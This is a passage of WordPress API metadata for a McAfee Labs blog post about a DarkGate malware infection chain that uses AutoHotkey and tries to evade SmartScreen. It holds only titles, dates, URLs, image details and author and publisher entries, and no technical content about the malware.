Smartscreen","datePublished":"2024-04-29T18:09:03+00:00","mainEntityOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/"},"wordCount":2301,"publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_021323.png","articleSection":["McAfee Labs"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/","url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/","name":"The Darkgate Menace: Leveraging Autohotkey & Attempt to Evade Smartscreen | McAfee Blog","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/#primaryimage"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_021323.png","datePublished":"2024-04-29T18:09:03+00:00","description":"Authored by Yashvi Shah, Lakshya Mathur and Preksha Saxena McAfee Labs has recently uncovered a novel infection chain associated with DarkGate malware.","breadcrumb":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/#primaryimage","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_021323.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_021323.png","width":300,"height":200},{"@type":"BreadcrumbList","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Blog","item":"https:\/\/www.mcafee.com\/blogs\/"},{"@type":"ListItem","position":2,"name":"Other Blogs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/"},{"@type":"ListItem","position":3,"name":"McAfee Labs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/"},{"@type":"ListItem","position":4,"name":"The Darkgate Menace: Leveraging Autohotkey & Attempt to Evade Smartscreen"}]},{"@type":"WebSite","@id":"https:\/\/www.mcafee.com\/blogs\/#website","url":"https:\/\/www.mcafee.com\/blogs\/","name":"McAfee Blog","description":"Internet Security News","publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.mcafee.com\/blogs\/#organization","name":"McAfee","url":"https:\/\/www.mcafee.com\/blogs\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","width":1286,"height":336,"caption":"McAfee"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee","https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.youtube.com\/McAfee"]},{"@type":"Person","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad","name":"McAfee Labs","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/af947d76ffbef8521094b476cf8050c3","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg","caption":"McAfee Labs"},"description":"McAfee Labs is one of the leading sources for threat research, threat intelligence, and cybersecurity thought leadership. See our blog posts below for more information.","sameAs":["https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee_Labs"],"url":"https:\/\/www.mcafee.com\/blogs\/author\/mcafee-labs\/"}]}},"_links":{"self":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/190356","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/users\/695"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/comments?post=190356"}],"version-history":[{"count":6,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/190356\/revisions"}],"predecessor-version":[{"id":190962,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/190356\/revisions\/190962"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media\/190932"}],"wp:attachment":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media?parent=190356"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/categories?post=190356"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/tags?post=190356"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/coauthors?post=190356"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}